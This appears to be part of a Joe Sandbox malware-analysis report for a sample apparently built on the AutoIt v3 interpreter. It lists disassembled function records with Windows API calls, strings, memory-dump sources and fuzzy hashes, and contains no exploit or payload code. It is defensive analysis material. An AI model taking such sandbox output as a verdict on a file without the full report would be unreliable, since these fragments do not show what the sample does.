Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: f37c34ea12aeae771452606bd4bd97a80d29c81301671afae1a5499159db022f
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 75C162322451930ADF2D4639C4781BFBBA25EA37B135A176DD8B3CF2D4EE20C965D620

Function 006025FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 89cf8ad4a408c6f3d0c590f9cca5a5c88f7df5918cf3cbd7fe49302aa31d41ec
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 0EC197322451930ADF2D463AC43817FFBA25EA37B135A176DD4B2DF2D4EE10C929E620

Function 00601978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 1981555a567ae86af052c4df44bfb64d4ed07b3a882a35f5b50fb674d7739b1a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 30C170322851930ADF2D463AC4741BFBBA25EA37B135A176DD4B3CF2C4EE20C925D620

Function 00657806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0065785B
DeleteObject.GDI32(00000000), ref: 0065786D
DestroyWindow.USER32 ref: 0065787B
GetDesktopWindow.USER32 ref: 00657895
GetWindowRect.USER32(00000000), ref: 0065789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006579DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006579ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657A35
GetClientRect.USER32(00000000,?), ref: 00657A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00657A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657ABB
GlobalLock.KERNEL32(00000000), ref: 00657AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657AD3
GlobalUnlock.KERNEL32(00000000), ref: 00657ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657AE3
GlobalFree.KERNEL32(00000000), ref: 00657AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00672CAC,00000000), ref: 00657B16
GlobalFree.KERNEL32(00000000), ref: 00657B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00657B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00657B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00657D7A

Strings

DISPLAY, xrefs: 00657BDD
AutoIt v3, xrefs: 00657A2D
, xrefs: 00657D00
static, xrefs: 00657A75, 00657BCC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: fa2a028760e3968c8fd81d06542bd07c8b8d9fb3a6ca967d7db119c6ec56d44c
Instruction ID: 7d6500bb66b4cd4da786fd93b843268d9c073fe21bc559abf5acd48a6a35f39d
Opcode Fuzzy Hash: fa2a028760e3968c8fd81d06542bd07c8b8d9fb3a6ca967d7db119c6ec56d44c
Instruction Fuzzy Hash: 4E024B71900115EFDB14DFA4EC89EAE7BBAFF49311F148168F915AB2A1CB70AD05CB60

Function 0066356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0066F910), ref: 00663627
IsWindowVisible.USER32(?), ref: 0066364B

Strings

SETCURRENTSELECTION, xrefs: 006637B6
GETCURRENTCOL, xrefs: 00663928
EDITPASTE, xrefs: 0066395F
GETLINECOUNT, xrefs: 006638C6
CURRENTTAB, xrefs: 006636BD
SENDCOMMANDID, xrefs: 006639DA
SHOWDROPDOWN, xrefs: 006636E0
GETLINE, xrefs: 0066399B
GETCURRENTLINE, xrefs: 006638ED
CHECK, xrefs: 0066386D
ADDSTRING, xrefs: 00663716
TABRIGHT, xrefs: 0066369D
ISCHECKED, xrefs: 00663839
SELECTSTRING, xrefs: 00663806
UNCHECK, xrefs: 00663883
ISVISIBLE, xrefs: 00663637
ISENABLED, xrefs: 0066366B
TABLEFT, xrefs: 00663687
HIDEDROPDOWN, xrefs: 00663700
GETCURRENTSELECTION, xrefs: 006637E3
FINDSTRING, xrefs: 00663776
DELSTRING, xrefs: 00663749
GETSELECTED, xrefs: 006638A3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: ddebfd9c503d7a5d91bbb8adc61dbf71d03073aca49f2875d8bb2371e6ed2dd5
Instruction ID: 02d255307544b49331e6fc5f702acf0f6d515290376d8bb59e67c402acc19665
Opcode Fuzzy Hash: ddebfd9c503d7a5d91bbb8adc61dbf71d03073aca49f2875d8bb2371e6ed2dd5
Instruction Fuzzy Hash: 08D16E702083519BCF08EF14C455AAE7BA7AF95354F14446CF8829B3E3DB21EE0ACB95

Function 0066A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0066A630
GetSysColorBrush.USER32(0000000F), ref: 0066A661
GetSysColor.USER32(0000000F), ref: 0066A66D
SetBkColor.GDI32(?,000000FF), ref: 0066A687
SelectObject.GDI32(?,00000000), ref: 0066A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0066A6C1
GetSysColor.USER32(00000010), ref: 0066A6C9
CreateSolidBrush.GDI32(00000000), ref: 0066A6D0
FrameRect.USER32(?,?,00000000), ref: 0066A6DF
DeleteObject.GDI32(00000000), ref: 0066A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0066A731
FillRect.USER32(?,?,00000000), ref: 0066A763
GetWindowLongW.USER32(?,000000F0), ref: 0066A78E

Part of subcall function 0066A8CA: GetSysColor.USER32(00000012), ref: 0066A903
Part of subcall function 0066A8CA: SetTextColor.GDI32(?,?), ref: 0066A907
Part of subcall function 0066A8CA: GetSysColorBrush.USER32(0000000F), ref: 0066A91D
Part of subcall function 0066A8CA: GetSysColor.USER32(0000000F), ref: 0066A928
Part of subcall function 0066A8CA: GetSysColor.USER32(00000011), ref: 0066A945
Part of subcall function 0066A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066A953
Part of subcall function 0066A8CA: SelectObject.GDI32(?,00000000), ref: 0066A964
Part of subcall function 0066A8CA: SetBkColor.GDI32(?,00000000), ref: 0066A96D
Part of subcall function 0066A8CA: SelectObject.GDI32(?,?), ref: 0066A97A
Part of subcall function 0066A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0066A999
Part of subcall function 0066A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066A9B0
Part of subcall function 0066A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0066A9C5
Part of subcall function 0066A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066A9ED

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: ba2ec62ec60869e5e0980e8894a7008e375018e7c65d2ebecb7d85b8b08dca93
Instruction ID: 043dd59e553dc6d70c78724ad767ca651d53e246076d4598626a50b8b0aeb55c
Opcode Fuzzy Hash: ba2ec62ec60869e5e0980e8894a7008e375018e7c65d2ebecb7d85b8b08dca93
Instruction Fuzzy Hash: 07916072008301FFD7109FA4EC08A5BBBAAFF49321F145B29F562A61A1D771D945CF52

Function 005E2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 005E2CA2
DeleteObject.GDI32(00000000), ref: 005E2CE8
DeleteObject.GDI32(00000000), ref: 005E2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 005E2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 005E2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0061C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0061C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0061C89D

Part of subcall function 005E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E2036,?,00000000,?,?,?,?,005E16CB,00000000,?), ref: 005E1B9A

SendMessageW.USER32(?,00001053), ref: 0061C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0061C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0061C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0061C912

Strings

0, xrefs: 0061C731

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 0846082b22dd1509a50133219871ec25c01afac30bb1016925c8b897fdf2afd6
Instruction ID: 5a49eba288fed2fc02acb2b19d0f7e09b4607936810267b4decfdef9aa90076d
Opcode Fuzzy Hash: 0846082b22dd1509a50133219871ec25c01afac30bb1016925c8b897fdf2afd6
Instruction Fuzzy Hash: D5128D30644241EFDB14CF25C888BEDBBE6BF45320F584569E49ACB262C771EC92DB91

Function 006574AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006574DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0065759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006575DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006575ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00657633
GetClientRect.USER32(00000000,?), ref: 0065763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00657683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00657692
GetStockObject.GDI32(00000011), ref: 006576A2
SelectObject.GDI32(00000000,00000000), ref: 006576A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006576B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006576BF
DeleteDC.GDI32(00000000), ref: 006576C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006576F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0065770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00657746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0065775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0065776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0065779B
GetStockObject.GDI32(00000011), ref: 006577A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006577B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006577BB

Strings

DISPLAY, xrefs: 00657688
AutoIt v3, xrefs: 0065762B
msctls_progress32, xrefs: 0065773C
static, xrefs: 0065767D, 00657795

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e0ba3f97a33fd2ed23d073bc4217c8c11ddcdc2590ff009e38f60aa384847125
Instruction ID: 2fd27bb0abdb1bcb730bf9036b1a0a4e640f63eab12486e51f340fd2bdaa4aca
Opcode Fuzzy Hash: e0ba3f97a33fd2ed23d073bc4217c8c11ddcdc2590ff009e38f60aa384847125
Instruction Fuzzy Hash: BCA14171A40615BFEB14DFA4EC4AFAE7BBAEB45711F004114FA15A72E0DBB0AD00CB64

Function 0064AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0064AD1E
GetDriveTypeW.KERNEL32(?,0066FAC0,?,\\.\,0066F910), ref: 0064ADFB
SetErrorMode.KERNEL32(00000000,0066FAC0,?,\\.\,0066F910), ref: 0064AF59

Strings

SATA, xrefs: 0064AF0C
USB, xrefs: 0064AEF0
\\.\, xrefs: 0064AD70
RAMDisk, xrefs: 0064AE25
Unknown, xrefs: 0064AE1B, 0064AEBF
iSCSI, xrefs: 0064AEFE
RAID, xrefs: 0064AEF7
SSD, xrefs: 0064AE86
PhysicalDrive, xrefs: 0064ADA7
CDROM, xrefs: 0064AE2F
FileBackedVirtual, xrefs: 0064AF28
MMC, xrefs: 0064AF1A
SCSI, xrefs: 0064AEC6
SSA, xrefs: 0064AEE2
ATA, xrefs: 0064AED4
Fixed, xrefs: 0064AE43
ATAPI, xrefs: 0064AECD
Fibre, xrefs: 0064AEE9
1394, xrefs: 0064AEDB
Virtual, xrefs: 0064AF21
Removable, xrefs: 0064AE4D
Network, xrefs: 0064AE39
SAS, xrefs: 0064AF05

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 86efe88dd57a51792407497fe57d3496eeca6b2e5af18a3acb8b54e8e69cfbd6
Instruction ID: 2c8e6065a93d2f6ecc5e50c1a3d316d6a5e30d9e98cf03b0bd4f51cfc9a7d71a
Opcode Fuzzy Hash: 86efe88dd57a51792407497fe57d3496eeca6b2e5af18a3acb8b54e8e69cfbd6
Instruction Fuzzy Hash: 8051B1B168824ABF8F44DF90C942CFD77A7EF497107254066E407A76D1DA329D06EB43

Function 005E68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 005E6931
__wcsnicmp.LIBCMT ref: 005E6949
__wcsnicmp.LIBCMT ref: 005E6961
__wcsnicmp.LIBCMT ref: 005E6979
__wcsnicmp.LIBCMT ref: 005E6991
__wcsnicmp.LIBCMT ref: 005E69A9
__wcsnicmp.LIBCMT ref: 005E69C1
__wcsnicmp.LIBCMT ref: 005E69D5
__wcsnicmp.LIBCMT ref: 005E6A16
__wcsnicmp.LIBCMT ref: 005E6A2A
__wcsnicmp.LIBCMT ref: 005E6A3E
__wcsnicmp.LIBCMT ref: 005E6A52

Strings

Unterminated group of comments, xrefs: 0061E403
#include-once, xrefs: 005E698B
#comments-start, xrefs: 005E69BB, 005E6A10
#cs, xrefs: 005E69CF, 005E6A24
#pragma compile, xrefs: 005E692B
#include, xrefs: 005E69A3
#OnAutoItStartRegister, xrefs: 005E6973
#requireadmin, xrefs: 005E695B
#comments-end, xrefs: 005E6A38
#ce, xrefs: 005E6A4C
Bad directive syntax error, xrefs: 0061E31A
Cannot parse #include, xrefs: 0061E3F0
#notrayicon, xrefs: 005E6943

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: b008d1394b3dd7c844dc0e927db28b32a60aa481ee572cda50530a69dd813fa1
Instruction ID: 015079809cf5b3c2a46d637b06f5821cc3ddaacf02cd925fde21c78a157ea17d
Opcode Fuzzy Hash: b008d1394b3dd7c844dc0e927db28b32a60aa481ee572cda50530a69dd813fa1
Instruction Fuzzy Hash: 1F814DB1640246AACB18AF61DC43FEF3BAABF15780F044029FD85AB1C2EB71DD41C255

Function 00669A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00669AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00669B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00669BA7

Strings

0, xrefs: 00669BE4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 243ac1d1814db082a47eee4e6cdd432348a820468c8dc5c2ffb63a8be3d67698
Instruction ID: faf2deda5c9e11b75616a37935fbba50f7ba76c269a2358810f2266803f6334d
Opcode Fuzzy Hash: 243ac1d1814db082a47eee4e6cdd432348a820468c8dc5c2ffb63a8be3d67698
Instruction Fuzzy Hash: F502BC30108201AFDB25CF24C849BAABBEAFF89714F04852DF999D62A1C775D945CF62

Function 0066A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0066A903
SetTextColor.GDI32(?,?), ref: 0066A907
GetSysColorBrush.USER32(0000000F), ref: 0066A91D
GetSysColor.USER32(0000000F), ref: 0066A928
CreateSolidBrush.GDI32(?), ref: 0066A92D
GetSysColor.USER32(00000011), ref: 0066A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066A953
SelectObject.GDI32(?,00000000), ref: 0066A964
SetBkColor.GDI32(?,00000000), ref: 0066A96D
SelectObject.GDI32(?,?), ref: 0066A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0066A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0066A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0066AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0066AA32
DrawFocusRect.USER32(?,?), ref: 0066AA3D
GetSysColor.USER32(00000011), ref: 0066AA4B
SetTextColor.GDI32(?,00000000), ref: 0066AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0066AA67
SelectObject.GDI32(?,0066A5FA), ref: 0066AA7E
DeleteObject.GDI32(?), ref: 0066AA89
SelectObject.GDI32(?,?), ref: 0066AA8F
DeleteObject.GDI32(?), ref: 0066AA94
SetTextColor.GDI32(?,?), ref: 0066AA9A
SetBkColor.GDI32(?,?), ref: 0066AAA4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 171add628d2b13e7382a5fc18492f211bee964b5fdac5494b77ea043a9d3a4b5
Instruction ID: 0533169f8e67fbf154f74bd8e2e70cd84c5b4ed6a742bae98f39c4b9082fd4c6
Opcode Fuzzy Hash: 171add628d2b13e7382a5fc18492f211bee964b5fdac5494b77ea043a9d3a4b5
Instruction Fuzzy Hash: 6E512F71900208EFDB119FA4EC48E9EBB7AEF49320F215625F911AB2A1D7B19D40DF90

Function 006689D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

